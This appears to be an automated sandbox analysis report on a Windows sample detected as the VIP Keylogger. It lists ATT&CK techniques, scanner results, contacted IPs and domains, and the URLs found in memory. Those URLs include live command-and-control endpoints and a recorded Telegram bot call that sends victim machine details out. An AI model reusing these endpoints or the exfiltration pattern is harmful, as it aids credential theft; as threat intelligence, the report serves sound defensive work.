Source: Yara match	File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7620, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7620, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2Lzx7LMDWV.exe	32%	ReversingLabs
2Lzx7LMDWV.exe	30%	Virustotal		Browse
2Lzx7LMDWV.exe	100%	Avira	HEUR/AGEN.1309540
2Lzx7LMDWV.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
15.164.165.52.in-addr.arpa	unknown	unknown	true	unknown
checkip.dyndns.org	unknown	unknown	true	unknown
200.163.202.172.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2001/11/2024%20/%2015:20:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.82	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers?	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lB	2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000003093000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.tiro.com	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.000000000424A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004126000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004174000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en	2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000003058000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://varders.kozow.com:8081	2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.sajatypeworks.com	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000000.00000002.1723442716.0000000005719000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a	2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	2Lzx7LMDWV.exe, 00000004.00000002.4148303554.000000000412E000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004225000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F8A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004101000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000003062000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.galapagosdesign.com/DPlease	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	2Lzx7LMDWV.exe, 00000000.00000002.1719951463.0000000002841000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	2Lzx7LMDWV.exe, 00000000.00000002.1723475118.0000000005754000.00000004.00000020.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/	2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000003098000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/173.254.250.82$	2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F62000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.000000000424A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004126000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004174000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.carterandcone.coml	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers/cabarga.htmlN	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.jiyu-kobo.co.jp/	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	2Lzx7LMDWV.exe, 00000004.00000002.4148303554.000000000412E000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004225000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F8A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004101000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546535
Start date and time:	2024-11-01 04:48:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2Lzx7LMDWV.exe renamed because original name is a hash value
Original Sample Name:	f70379292f5c009d309aa771803b8a47.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@6/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 89 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 2Lzx7LMDWV.exe, PID 7620 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:49:00	API Interceptor	12441444x Sleep call for process: 2Lzx7LMDWV.exe modified
23:49:02	API Interceptor	13x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	PZKAQY0bX5.exe	Get hash	malicious	Blank Grabber	Browse
	aLRjksjY78.exe	Get hash	malicious	HackBrowser	Browse
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
188.114.97.3	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.timizoasisey.shop/3p0l/
	lf1SPbZI3V.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/alpha2/five/fre.php
	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/vdlzo
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	zxalphamn.doc	Get hash	malicious	Lokibot	Browse	touxzw.ir/alpha2/five/fre.php
	rPO-000172483.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/2b9b/
	rPO_28102400.exe	Get hash	malicious	Lokibot	Browse	ghcopz.shop/ClarkB/PWS/fre.php
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
	SR3JZpolPo.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	5Z1WFRMTOXRH6X21Z8NU8.exe	Get hash	malicious	Unknown	Browse	artvisions-autoinsider.com/8bkjdSdfjCe/index.php
193.122.6.168	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	PROFORMA FATURA pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	clipper.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Slip_SJJ023639#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	z1MRforsteamDRUM-A1_pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	INVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	z17Mz7zumpwTUMRxyS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	INVOICE ATTACHMENT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	MB267382625AE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
checkip.dyndns.com	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	z17Mz7zumpwTUMRxyS.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	INVOICE ATTACHMENT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	MB267382625AE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse	132.226.8.169
api.telegram.org	Quotation Document.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	PZKAQY0bX5.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	aLRjksjY78.exe	Get hash	malicious	HackBrowser	Browse	149.154.167.220
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	RFQ Proposals ADC-24-65.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Payment Receipt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Product Inquiry-002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation enquiry.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
